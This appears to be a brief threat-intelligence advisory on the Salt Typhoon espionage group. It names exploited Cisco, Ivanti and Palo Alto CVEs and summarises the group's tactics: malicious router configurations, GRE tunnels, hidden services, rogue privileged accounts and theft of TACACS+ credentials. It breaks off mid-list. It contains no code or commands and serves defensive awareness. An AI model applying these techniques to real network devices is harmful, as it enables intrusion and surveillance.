Overview
Salt Typhoon is a China-linked cyberespionage group that has spent years exploiting vulnerabilities in Cisco, Ivanti, and Palo Alto devices to infiltrate global critical infrastructure. By compromising backbone and edge routers, the group has maintained persistent access to telecom, government, and military networks, enabling large-scale surveillance and data theft across more than 80 countries.
Technical Details
- Initial Access: Exploited known flaws in Cisco (CVE-2018-0171, CVE-2023-20198, CVE- 2023-20273), Ivanti (CVE-2024-21887), and Palo Alto Networks (CVE-2024-3400). Attackers targeted backbone and edge routers, regardless of owner, to establish a foothold in multiple networks.
- Payload Delivery: Deployed malicious configurations, enabled GRE tunnels, and abused on-box Linux containers on Cisco devices to stage tools, capture data locally, and move laterally.
- Persistence: Modified Access Control Lists (ACLs), opened standard and non-standard ports, enabled hidden services, and created privileged local accounts with sudo/root access.
- Lateral Movement: Captured TACACS+ traffic to steal administrator credentials…..
